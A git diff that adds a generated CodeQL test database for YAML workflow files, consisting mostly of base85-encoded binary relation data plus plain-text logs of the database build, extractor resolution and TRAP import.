z5BBHa*z}#j^IwD4zSdcU{yjK$BUF5Zu0!QxefO1omZSefmBh`r@4p3+bq$}l;s2+g zLw@*pPM-4r8AC{{I>6A!JEE&leewO{AWK! zyC42`#T&;9Prj$R?SnUc`S(TV9z{w$`_}W-O$v(FzSgI9=N>{5FZH*;9|?-r`sTy2 zo5CX9$Ums>xh0RYu=MNlJKz1kHU7?6q{MwNe>(ndI#}O3`+;-a%@!1=uWM%Ceerk4 zB8ite%%Ec}OaAPJC+E7`tE7+PC7*k{n-jd|%ZHhDd`2ntvR=-aH5hR6vrl#e_ijQ; ze)u!v?jS(tuxI7(9QMKYx0ml_T=Bhj!9S#U<9Ol8nsoDmH#}#8zdkrNJV)RQ@vVPw z$`qCfqPcN6I*z)CY@&$Nxal?K8u4lJa+~6w+mA8!_#wm zRPf5v`OgPGCO9_pbPmS`C*S>GKEIc`rP%PazVA!V?gT87_?YKO!5f|n$U8YWw&l4z zc*Aoc`P?Z=so(Nk5xn8Kh`iH-W4&|aKLYo=O8!g9_xoD@tMK2BMG`Oh&gUJ$8~$M3 zJA-4xpL@7FJ9xvNwe8Lgjtzg-wmUC)!=JV7R)fpaeQUlvIYZrrSS0cBoG%LA@Z5vE zi-Tjs)BUg}c*E2C^L@dw;px47S@4FZ_vcmM^1O107oI2Lf4Jt?`1n5jXz+$7XS(}X zaBO&bFI|go{i`ZZ=fE0vAFuf}Ugp5>jc#qtzqZyl-+Sr$nqT83-+SqX;0+(|r5l4| z!)Frwror#lRzBV{E5UEZ%G0=F-&62!Dc(3<`a1txgExKMZ?^}>rtb{!JA>E0?&n3| zcLm30y++`7V``}RA*8=mgl`@!vd-w-c- z_rrgn=GS=XI}QB7;7#96!5<2aweRNWX5bHFt?%#o^*lTO?eKqqMG`Od{oa2>P`uVR zpYQ1Ihh}exm;5d9e*{Rs?va}BKHM7rQL}5@2j@H;|ED@w-z)3l`TDt_ICZj5_QikP z><#f!XM6l71jQSkbMc=n>En3G_k8^-c+HoO=j%7YvCd80IsYy=`OZz;@BOEOW5a(E z{Ezs~;fc!MIqZY~G*+I*73aAN{-26Bj+gqLufGIuc+Ld>TX1Z6j==wcZ~dn$PwVfD zzYdEeUg}Tb|0{T{KMQ{+@c)|3fAYi@p0jy;hG!)4@qC^Q-tgR&yyt>r!_#}_f59tH z=jnNOt&vhc^K=d`1}EPf^ZDNItr?y^`@Tnj`&lIM@a$g_yy3ZkyiJ1pA=LWt>|YkV z;kgi;J)xBP4bPslH{cD=MdW$@kdnVK57r;yb7th<_vGh$e+fQkLrJ{kGoPNbG~f;Y z!@)U|1J2*@=RWK?O9S5U=RWK?0|UMxIcT&e3>U_t%y8N1n2Hh z63>0u?;pJ3$@hMLU~oT#+Lu}O2V-5Yxs|8&PryF}izHt1snO2^G~eIh?qT!c*t3>O z;w7Io=@$SZef$6CxtIDwgBwKUa}bY*VXbfedY-L+K0bRwNxbC4y?i$v$f|!DepOm**PrbFoO` zmx1TK%(w5Q;Fn{O#K-S-MewFCwfheS_d}?2v+tF`>wAf_hW*tQ=ZuW=*~|Sk z`0{E09X%KS+L~YErTz}!*9C9*cz&-Bjt!rqc)THa!-uod-xwU5xg7(3Q*iR#pYr#f zxg|I@-!GHkx8l>UzlQwhdEN?rKmKi4-^;k-oG-_}U1vkQ)Mw56I}6O`>U+6P+!_5{ Q!LfNS=X`hY=Dm*lKmT;wC;$Ke literal 0 HcmV?d00001 diff --git a/ql/src/test-db/db-yaml/default/yaml.rel.checksum b/ql/src/test-db/db-yaml/default/yaml.rel.checksum new file mode 100644 index 0000000000000000000000000000000000000000..a3783e268b8d3866cb97455ff14cd484ab0b8d47 GIT binary patch literal 12 ScmZQzU|?hbf)7vo?g9V^eFH)O literal 0 HcmV?d00001 diff --git a/ql/src/test-db/db-yaml/default/yaml_locations.rel b/ql/src/test-db/db-yaml/default/yaml_locations.rel new file mode 100644 index 0000000000000000000000000000000000000000..014f03a3a638a16c87b040ee21668cc0ff098479 GIT binary patch literal 2664 zcmWN~QxqLW06@VPHFg@?wr$&uZQHhO+iqhtb{gBZt;IqCk8QzLo8wwp9CbN28l>a5~`DwWF#jADM>|Y(vX&Pq^BAg$V)~t zk(n%HB^%kvLk@D1i`?X+H2En&K?+frA{3<<#VJ8aN>PTYl%*WysX#?4QJE^#;taK^ zLtW}op9VDKG>vFX6V}s|W;CY-Eont-I?#r;w4*&8=|pGN(S?C@r5oMpK~H+on*sEp zFa7AxAjUJ8Aq-_0!x_OyMlqT(jAa}XSj$8vF_|e$Wg63&!Axc`n>oy79`jkl0v57} z#Vlbd%UI3|R3D%ZGf9Yt?&lUv;84tKd{KeFEE2M>72BOddFr#$01 zFL=o-zVn(lyyYG5`M^g$@tH4tfTJ9w~`W0uqvfL?k8&$w^8wQjwZ83?VJ)NY7w0kdaJeCJR}~Ms{+L zlUxiUHzmkJUhLRG5MnHtpOFKSVn zI@F~e^=Uvu8qt_0G^G>GXif`S(u&r!p)KubPX{{Eg@JUX8{O$aPkPatKJ=v@{TaY; z_A!EyjAArn7|S^JGM))cWDk>=%oL_Fjp@u_H#6D9EM_x@xy)le3s}e^7PEwnEM*zX zS;0zHv6?lkWgY9;z-D%_g}?cSt!!gEJJ`woKpQFW z4CnZdvs~m7m%W=&uW*%X)*19VH@L|yZgYpb+~YnEc<6k3eZ+en^Mt27<2f&Q$va;0 znm4@VgZn}BBcJ%p7rye1@BH8=zxeHZ07K9O1S2>h_=AvyA~azLOE|(4frvyRGVzH* zRHE@G(TPD!ViB7-#3ddHNk<|QlZ2!sBRMHZNh(s4hO}g16P^DMC?7QH>rj>?p$0u`x571~ghYE-8NHTjEL)TRz~sYh$- z(}0FFqA^WqN;8_%f|j(RE&XUmdpgjOPIRUVJ?Tm}y3>PR^rjDe>CXrTFpxnEW(Y$W w#&AY6hOw+*9OIe5L?$trDNJP=)0x3cW-*&NEN3pun8$n;u#iP8W(iCG2Txl!IsgCw literal 0 HcmV?d00001 diff --git a/ql/src/test-db/db-yaml/default/yaml_locations.rel.checksum b/ql/src/test-db/db-yaml/default/yaml_locations.rel.checksum new file mode 100644 index 0000000000000000000000000000000000000000..bb0c636593a1f0c3ca10cb8d7337d3771bfd6e82 GIT binary patch literal 12 RcmZQzU|?hb0!AH1O#lGM09gP4 literal 0 HcmV?d00001 diff --git a/ql/src/test-db/db-yaml/default/yaml_scalars.rel b/ql/src/test-db/db-yaml/default/yaml_scalars.rel new file mode 100644 index 0000000000000000000000000000000000000000..e045b05d47e291009889305846e60f9c1b64b7a1 GIT binary patch literal 3048 zcmYk;d+gU!9LMp`Ihb3h7)ta-E@7^r%cv}Vt`(U}X-P|JmYB2<=1#dKA++Cq%YDY? z&deWXjm>6;G50a|xy-CJb9p^K-{)`h-pFGyeq5^N-Q{q@Sc&%W;}#9j`~GKUp)+WX&3<>I2iCmUd;@L1{D6C~}+G zs=LNnntaaFqtnmT?MOIg}Y8tY- zPVEg8dSd$fHS;{6*`J4WCw;HxxqX^_ zTc_E#N79(PC+)E`>V&i>(ilH6?U^)+J$$xR(~$Y|n#^C+Q_{bz+2>dFsp((S?A_~{ z{NK<#?@i6QSg$!JZ|Q02-_x9v_cdqvL(Mt)SWi#?sbGM z|ES6NXWdEvtLFE=>lx|)(B%AQ8guugZAhcYd1D&ml|PrRnkHwzRR541%BK3< zcni(%x6;Y24AA_Zj5xb<;+-7N87o6{zE_1TsQk9@p47mYvrY|)M|9Z?jybPXaxUCw zD)SZYFqNFkAze0^yBwx@?%{e^%$`xnzl`gWZ(%t~=MEO`0M&`foyxk(q%OIGg&Zm7 zKdDQ;m*o^qKAcM`dsH}!6wl&3QF*6wW|!?eXX`w_u$L6`%SliM&TR9cu&00@w`)6)OZqRH(uO>SRkp8J*NE_|)Y^E*v$Kj`7{Pr4KTqPYvd zY3>5w8H)KgblKj8jhcM^(q#U(=2`#hkxf%K(V3@irpL#d>&#QP)VT{aziTV=)a2M! z_PTDTJ8|-AE6=Sv=-lJl|No-wbxn@_dtH-VTiNTHjN0++bi!XDU_m^pJIr^l9-(s=>S&#{)NwjvHS2CG>#7r4HGJP{-m|SS@v(Yr z+@mjwv+lOCzjd-EtEoEsTTj=l{|tReeAfSdKV6gUIl2?i(qubZ&xq$}vYi`~OV(BA zIZn3o9Vgp`j Initializing database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db. +[2024-02-03 10:17:51] Running plumbing command: codeql database init --language=yaml --extractor-options-verbosity=1 --qlconfig-file=/Users/pwntester/seclab/projects/actions/codeql-actions/qlconfig.yml --source-root=/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test --allow-missing-source-root=false --allow-already-existing -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db +[2024-02-03 10:17:51] Calling plumbing command: codeql resolve languages --extractor-options-verbosity=1 --format=betterjson +[2024-02-03 10:17:51] [DETAILS] resolve languages> Scanning for [codeql-extractor.yml] from /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/.codeqlmanifest.json +[2024-02-03 10:17:51] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/go/codeql-extractor.yml. +[2024-02-03 10:17:51] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/python/codeql-extractor.yml. +[2024-02-03 10:17:51] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/java/codeql-extractor.yml. +[2024-02-03 10:17:51] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/html/codeql-extractor.yml. +[2024-02-03 10:17:51] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/xml/codeql-extractor.yml. +[2024-02-03 10:17:52] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/properties/codeql-extractor.yml. +[2024-02-03 10:17:52] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/cpp/codeql-extractor.yml. +[2024-02-03 10:17:52] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/swift/codeql-extractor.yml. +[2024-02-03 10:17:52] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/csv/codeql-extractor.yml. +[2024-02-03 10:17:52] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/codeql-extractor.yml. +[2024-02-03 10:17:52] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/csharp/codeql-extractor.yml. +[2024-02-03 10:17:52] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/javascript/codeql-extractor.yml. +[2024-02-03 10:17:52] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/ruby/codeql-extractor.yml. +[2024-02-03 10:17:52] Plumbing command codeql resolve languages completed: + { + "aliases" : { + "c" : "cpp", + "c++" : "cpp", + "c-c++" : "cpp", + "c-cpp" : "cpp", + "c#" : "csharp", + "java-kotlin" : "java", + "kotlin" : "java", + "javascript-typescript" : "javascript", + "typescript" : "javascript" + }, + "extractors" : { + "go" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/go" + } + ], + "python" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/python", + "extractor_options" : { + "logging" : { + "title" : "Options pertaining to logging.", + "description" : "Options pertaining to logging.", + "type" : "object", + "properties" : { + "verbosity" : { + "title" : "Python extractor logging verbosity level.", + "description" : "Controls the level of verbosity of the CodeQL Python extractor.\nThe supported levels are (in order of increasing verbosity):\n\n - off\n - errors\n - warnings\n - info or progress\n - debug or progress+\n - trace or progress++\n - progress+++\n", + "type" : "string", + "pattern" : "^(off|errors|warnings|(info|progress)|(debug|progress\\+)|(trace|progress\\+\\+)|progress\\+\\+\\+)$" + } + } + } + } + } + ], + "java" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/java", + "extractor_options" : { + "exclude" : { + "title" : "A glob excluding files from analysis.", + "description" : "A glob indicating what files to exclude from the analysis.\n", + "type" : "string" + }, + "add_prefer_source" : { + "title" : "Whether to always prefer source files over class files.", + "description" : "A value indicating whether source files should be preferred over class files. If set to 'true', the extraction adds '-Xprefer:source' to the javac command line. If set to 'false', the extraction uses the default javac behavior ('-Xprefer:newer'). The default is 'true'.\n", + "type" : "string", + "pattern" : "^(false|true)$" + }, + "buildless" : { + "title" : "Whether to use buildless (standalone) extraction (experimental).", + "description" : "A value indicating, which type of extraction the autobuilder should perform. If 'true', then the standalone extractor will be used, otherwise tracing extraction will be performed. The default is 'false'. Note that buildless extraction will generally yield less accurate analysis results, and should only be used in cases where it is not possible to build the code (for example if it uses inaccessible dependencies).\n", + "type" : "string", + "pattern" : "^(false|true)$" + } + } + } + ], + "html" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/html" + } + ], + "xml" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/xml" + } + ], + "properties" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/properties" + } + ], + "cpp" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/cpp", + "extractor_options" : { } + } + ], + "swift" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/swift" + } + ], + "csv" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/csv" + } + ], + "yaml" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml" + } + ], + "csharp" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/csharp", + "extractor_options" : { + "trap" : { + "title" : "Options pertaining to TRAP.", + "description" : "Options pertaining to TRAP.", + "type" : "object", + "properties" : { + "compression" : { + "title" : "Controls compression for the TRAP files written by the extractor.", + "description" : "This option is only intended for use in debugging the extractor. Accepted values are 'brotli' (the default, to write brotli-compressed TRAP), 'gzip', and 'none' (to write uncompressed TRAP).\n", + "type" : "string", + "pattern" : "^(none|gzip|brotli)$" + } + } + }, + "buildless" : { + "title" : "Whether to use buildless (standalone) extraction.", + "description" : "A value indicating, which type of extraction the autobuilder should perform. If 'true', then the standalone extractor will be used, otherwise tracing extraction will be performed. The default is 'false'. Note that buildless extraction will generally yield less accurate analysis results, and should only be used in cases where it is not possible to build the code (for example if it uses inaccessible dependencies).\n", + "type" : "string", + "pattern" : "^(false|true)$" + }, + "cil" : { + "title" : "Whether to enable CIL extraction.", + "description" : "A value indicating, whether CIL extraction should be enabled. The default is 'true'.\n", + "type" : "string", + "pattern" : "^(false|true)$" + } + } + } + ], + "javascript" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/javascript", + "extractor_options" : { + "skip_types" : { + "title" : "Skip type extraction for TypeScript", + "description" : "Whether to skip the extraction of types in a TypeScript application", + "type" : "string", + "pattern" : "^(false|true)$" + } + } + } + ], + "ruby" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/ruby", + "extractor_options" : { + "trap" : { + "title" : "Options pertaining to TRAP.", + "description" : "Options pertaining to TRAP.", + "type" : "object", + "properties" : { + "compression" : { + "title" : "Controls compression for the TRAP files written by the extractor.", + "description" : "This option is only intended for use in debugging the extractor. Accepted values are 'gzip' (the default, to write gzip-compressed TRAP) and 'none' (to write uncompressed TRAP).\n", + "type" : "string", + "pattern" : "^(none|gzip)$" + } + } + } + } + } + ] + } + } +[2024-02-03 10:17:52] [PROGRESS] database init> Calculating baseline information in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test +[2024-02-03 10:17:52] [SPAMMY] database init> Ignoring the following directories when processing baseline information: .git, .hg, .svn. +[2024-02-03 10:17:52] [DETAILS] database init> Running command in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test: /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/tools/osx64/scc --by-file --exclude-dir .git,.hg,.svn --format json --no-large --no-min . +[2024-02-03 10:17:52] [PROGRESS] database init> Calculated baseline information for languages: (387ms). +[2024-02-03 10:17:52] [PROGRESS] database init> Resolving extractor yaml. +[2024-02-03 10:17:52] [DETAILS] database init> Found candidate extractor root for yaml: /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml. +[2024-02-03 10:17:52] [PROGRESS] database init> Successfully loaded extractor YAML (yaml) from /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml. +[2024-02-03 10:17:52] [PROGRESS] database init> Created skeleton CodeQL database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db. This in-progress database is ready to be populated by an extractor. +[2024-02-03 10:17:52] Plumbing command codeql database init completed. +[2024-02-03 10:17:52] [PROGRESS] database create> Running build command: [] +[2024-02-03 10:17:52] Running plumbing command: codeql database trace-command --working-dir=/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test --index-traceless-dbs --no-db-cluster -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db +[2024-02-03 10:17:52] Using autobuild script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/autobuild.sh. +[2024-02-03 10:17:52] [PROGRESS] database trace-command> Running command in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/autobuild.sh] +[2024-02-03 10:17:52] [build-stderr] Scanning for files in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test... +[2024-02-03 10:17:53] [build-stderr] /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db: Indexing files in in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test... +[2024-02-03 10:17:53] [build-stderr] Running command in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/index-files.sh, /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/working/files-to-index11251721875757902238.list] +[2024-02-03 10:17:53] Plumbing command codeql database trace-command completed. +[2024-02-03 10:17:53] [PROGRESS] database create> Finalizing database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db. +[2024-02-03 10:17:53] Running plumbing command: codeql database finalize --mode=trim --no-db-cluster -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db +[2024-02-03 10:17:53] [PROGRESS] database finalize> Running TRAP import for CodeQL database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db... +[2024-02-03 10:17:53] Running plumbing command: codeql dataset import --dbscheme=/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/yaml.dbscheme -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/db-yaml /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/trap/yaml +[2024-02-03 10:17:53] Clearing disk cache since the version file /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/db-yaml/default/cache/version does not exist +[2024-02-03 10:17:53] Tuple pool not found. Clearing relations with cached strings +[2024-02-03 10:17:53] Trimming disk cache at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/db-yaml/default/cache in mode clear. +[2024-02-03 10:17:53] Sequence stamp origin is -6222583521912648850 +[2024-02-03 10:17:53] Pausing evaluation to hard-clear memory at sequence stamp o+0 +[2024-02-03 10:17:53] Unpausing evaluation +[2024-02-03 10:17:53] Pausing evaluation to quickly trim disk at sequence stamp o+1 +[2024-02-03 10:17:53] Unpausing evaluation +[2024-02-03 10:17:53] Pausing evaluation to zealously trim disk at sequence stamp o+2 +[2024-02-03 10:17:53] Unpausing evaluation +[2024-02-03 10:17:53] Trimming completed (7ms): Purged everything. +[2024-02-03 10:17:53] Scanning for files in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/trap/yaml +[2024-02-03 10:17:53] Found 8 TRAP files (16.41 KiB) +[2024-02-03 10:17:53] [PROGRESS] dataset import> Importing TRAP files +[2024-02-03 10:17:53] Importing changed-files.yml.trap.gz (1 of 8) +[2024-02-03 10:17:53] Importing inter1.yml.trap.gz (2 of 8) +[2024-02-03 10:17:53] Importing no-flow1.yml.trap.gz (3 of 8) +[2024-02-03 10:17:53] Importing no-flow2.yml.trap.gz (4 of 8) +[2024-02-03 10:17:53] Importing simple1.yml.trap.gz (5 of 8) +[2024-02-03 10:17:53] Importing simple2.yml.trap.gz (6 of 8) +[2024-02-03 10:17:53] Importing test.yml.trap.gz (7 of 8) +[2024-02-03 10:17:53] Importing sourceLocationPrefix.trap.gz (8 of 8) +[2024-02-03 10:17:53] [PROGRESS] dataset import> Merging relations +[2024-02-03 10:17:53] Merging 1 fragment for 'files'. +[2024-02-03 10:17:53] Merged 56 bytes for 'files'. +[2024-02-03 10:17:53] Merging 1 fragment for 'folders'. +[2024-02-03 10:17:53] Merged 80 bytes for 'folders'. +[2024-02-03 10:17:53] Merging 1 fragment for 'containerparent'. +[2024-02-03 10:17:53] Merged 128 bytes for 'containerparent'. +[2024-02-03 10:17:53] Merging 1 fragment for 'yaml_scalars'. +[2024-02-03 10:17:53] Merged 3048 bytes (2.98 KiB) for 'yaml_scalars'. +[2024-02-03 10:17:53] Merging 1 fragment for 'yaml'. +[2024-02-03 10:17:53] Merged 7992 bytes (7.80 KiB) for 'yaml'. +[2024-02-03 10:17:53] Merging 1 fragment for 'locations_default'. +[2024-02-03 10:17:53] Merged 7992 bytes (7.80 KiB) for 'locations_default'. +[2024-02-03 10:17:53] Merging 1 fragment for 'yaml_locations'. +[2024-02-03 10:17:53] Merged 2664 bytes (2.60 KiB) for 'yaml_locations'. +[2024-02-03 10:17:53] Merging 1 fragment for 'sourceLocationPrefix'. +[2024-02-03 10:17:53] Merged 4 bytes for 'sourceLocationPrefix'. +[2024-02-03 10:17:53] Saving string and id pools to disk. +[2024-02-03 10:17:54] Finished importing TRAP files. +[2024-02-03 10:17:54] Read 77.48 KiB of uncompressed TRAP data. +[2024-02-03 10:17:54] Relation data size: 21.45 KiB (merge rate: 1.20 MiB/s) +[2024-02-03 10:17:54] String pool size: 2.05 MiB +[2024-02-03 10:17:54] ID pool size: 1.03 MiB +[2024-02-03 10:17:54] [PROGRESS] dataset import> Finished writing database (relations: 21.45 KiB; string pool: 2.05 MiB). +[2024-02-03 10:17:54] Pausing evaluation to close the cache at sequence stamp o+3 +[2024-02-03 10:17:54] The disk cache is freshly trimmed; leave it be. +[2024-02-03 10:17:54] Unpausing evaluation +[2024-02-03 10:17:54] Plumbing command codeql dataset import completed. +[2024-02-03 10:17:54] [PROGRESS] database finalize> TRAP import complete (817ms). +[2024-02-03 10:17:54] Running plumbing command: codeql database cleanup --mode=trim -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db +[2024-02-03 10:17:54] [PROGRESS] database cleanup> Cleaning up existing TRAP files after import... +[2024-02-03 10:17:54] [PROGRESS] database cleanup> TRAP files cleaned up (6ms). +[2024-02-03 10:17:54] [PROGRESS] database cleanup> Cleaning up scratch directory... +[2024-02-03 10:17:54] [PROGRESS] database cleanup> Scratch directory cleaned up (0ms). +[2024-02-03 10:17:54] Running plumbing command: codeql dataset cleanup --mode=trim -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/db-yaml +[2024-02-03 10:17:54] [PROGRESS] dataset cleanup> Cleaning up dataset in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/db-yaml. +[2024-02-03 10:17:54] Trimming disk cache at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/db-yaml/default/cache in mode trim. +[2024-02-03 10:17:54] Sequence stamp origin is -6222583518558519910 +[2024-02-03 10:17:54] Pausing evaluation to zealously trim disk at sequence stamp o+0 +[2024-02-03 10:17:54] Unpausing evaluation +[2024-02-03 10:17:54] Trimming completed (2ms): Trimmed disposable data from cache. +[2024-02-03 10:17:54] Pausing evaluation to close the cache at sequence stamp o+1 +[2024-02-03 10:17:54] The disk cache is freshly trimmed; leave it be. +[2024-02-03 10:17:54] Unpausing evaluation +[2024-02-03 10:17:54] [PROGRESS] dataset cleanup> Trimmed disposable data from cache. +[2024-02-03 10:17:54] [PROGRESS] dataset cleanup> Finalizing dataset in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/db-yaml +[2024-02-03 10:17:54] [DETAILS] dataset cleanup> Finished deleting ID pool from /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/db-yaml (4ms). +[2024-02-03 10:17:54] Plumbing command codeql dataset cleanup completed. +[2024-02-03 10:17:54] Plumbing command codeql database cleanup completed with status 0. +[2024-02-03 10:17:54] [PROGRESS] database finalize> Finished zipping source archive (3.73 KiB). +[2024-02-03 10:17:54] Plumbing command codeql database finalize completed. +[2024-02-03 10:17:54] [PROGRESS] database create> Successfully created database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db. +[2024-02-03 10:17:54] Terminating normally. diff --git a/ql/src/test-db/log/database-index-files-20240203.101752.962.log b/ql/src/test-db/log/database-index-files-20240203.101752.962.log new file mode 100644 index 000000000000..f410634a29ff --- /dev/null +++ b/ql/src/test-db/log/database-index-files-20240203.101752.962.log @@ -0,0 +1,21 @@ +[2024-02-03 10:17:52] This is codeql database index-files --include-extension=.yaml --include-extension=.yml --size-limit=5m --language=yaml /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db +[2024-02-03 10:17:52] Log file was started late. +[2024-02-03 10:17:52] Using index-files script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/index-files.sh. +[2024-02-03 10:17:52] [PROGRESS] database index-files> Scanning for files in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test... +[2024-02-03 10:17:52] Calling plumbing command: codeql resolve files --include-extension=.yaml --include-extension=.yml --size-limit=5m /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test --format=json +[2024-02-03 10:17:53] [PROGRESS] resolve files> Scanning /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test... +[2024-02-03 10:17:53] Plumbing command codeql resolve files completed: + [ + "/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test/changed-files.yml", + "/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test/inter1.yml", + "/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test/test.yml", + "/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test/no-flow1.yml", + "/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test/no-flow2.yml", + "/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test/simple1.yml", + "/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test/simple2.yml" + ] +[2024-02-03 10:17:53] [DETAILS] database index-files> Found 7 files. +[2024-02-03 10:17:53] [PROGRESS] database index-files> /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db: Indexing files in in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test... +[2024-02-03 10:17:53] Using index-files script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/index-files.sh. +[2024-02-03 10:17:53] [PROGRESS] database index-files> Running command in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/index-files.sh, /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/working/files-to-index11251721875757902238.list] +[2024-02-03 10:17:53] Terminating normally. diff --git a/ql/src/test-db/src.zip b/ql/src/test-db/src.zip new file mode 100644 index 0000000000000000000000000000000000000000..9c82ac3a64444a993e3a461dc000184a22d1e3a8 GIT binary patch literal 3816 zcmcImc{r4N8y@S7B{SK=NTkh#nL(1VrA-ZHjHS`3oUF~53^Qa2O^Bj=jVy6c985U& zeHn+5eG6p`2PGa)KF_JzvD?24Noy;#teq+~c`=vh_tIRa?!WW!^|NG ziWLj;R3$WF@PRVmbLC@G8WJxWF2*{5-xFje*R*S{jZdE!ql66TQQ9{;;m$p;g*`U? zCf-^uQULUp%4!G#7t#!jL?f3H3JPDSywe@G3Sk`M`KxcmY65Byc)29G{#GqkqAbEv z_ng;paJl96up=4?$D13oqYYH=$tX04R*c*Yqk$xLHp8l3-mDwm4Uu{KMEcU^u3gX# z!xx#WWf>W7TI-dIB}04f1e(e4t>hI9z8ue)cz6qw6;6Lea%lDGDGZNGtG7AwAL;$d z_%CBH?e2xzWTU{3A2;RQO(K$7&6u6jm%dyH!x!`u;{Dg>`{LVY3IL9DTDgZg^N#94 z*CqE@WSSR{BO3LW9ZYSuXr(_D4YNI>xsX*HNo3EjvRPtlOoI>*=JMeK_F|@4QW#A) 